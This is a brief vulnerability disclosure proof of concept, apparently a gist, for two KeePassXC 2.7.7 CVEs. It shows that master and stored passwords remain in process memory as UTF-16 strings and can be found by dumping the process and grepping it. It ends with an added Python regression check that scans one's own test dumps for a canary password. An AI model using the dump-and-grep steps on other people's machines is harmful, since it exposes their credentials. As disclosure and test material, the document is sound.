POC: CVE-2024-33900, CVE-2024-33901
1. Get a memory dump of KeePassXC (e.g. via Windows Task Manager or VirtualBox debugvm)
2a. CVE-2024-33900 - get master password: strings -e b <filename> | grep "YOUR MASTER PASSWORD"
2b. CVE-2024-33901 - get stored password: strings -e b <filename> | grep "YOUR STORED PASSWORD"
Note: Both attacks work every time when the database is open in KeePassXC. When the database is closed or locked, the probability is 1 in 10 and 4 in 10, respectively.
Why does it work? Don't really know :P But the data is somewhere in the memory regions of the Qt framework as a UTF-16 string.
This affects KeePassXC version 2.7.7. There is a high probability that other versions are also affected.
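
A regression check for this behaviour, as an added example that is not part of the original gist: it scans a dump of your own test instance for a throwaway canary password in both UTF-16 byte orders and UTF-8, so a build can be re-tested after locking or closing the database. The function name, canary value and sample bytes are assumptions constructed for illustration.

```python
import io

# Encodings the canary may appear in; Qt's QString holds UTF-16 code units,
# which land in memory in the host's byte order.
ENCODINGS = ("utf-16-le", "utf-16-be", "utf-8")


def find_canary(stream, canary, chunk_size=1 << 20):
    """Return sorted (offset, encoding) hits for `canary` in a binary stream.

    Reads in chunks so a multi-gigabyte dump is never loaded whole, and keeps
    an overlap so a match straddling a chunk boundary is still found.
    """
    if not canary:
        raise ValueError("canary must be a non-empty string")
    needles = {enc: canary.encode(enc) for enc in ENCODINGS}
    overlap = max(len(n) for n in needles.values()) - 1
    hits = set()          # a set, because the overlap can re-find a short match
    tail, base = b"", 0   # base = file offset of tail[0]
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        buf = tail + chunk
        for enc, needle in needles.items():
            pos = buf.find(needle)
            while pos != -1:
                hits.add((base + pos, enc))
                pos = buf.find(needle, pos + 1)
        keep = min(overlap, len(buf))
        base += len(buf) - keep
        tail = buf[-keep:] if keep else b""
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample standing in for a dump file: filler bytes around a
    # canary stored as UTF-16LE. For a real dump, use open(path, "rb").
    canary = "Canary-123!"
    sample = b"\xff" * 10 + canary.encode("utf-16-le") + b"\xff" * 5
    for offset, enc in find_canary(io.BytesIO(sample), canary, chunk_size=7):
        print(f"canary found at offset {offset} as {enc}")
```

An empty result for dumps taken after lock or close is the outcome a fixed build should produce; any hit gives the offset to inspect.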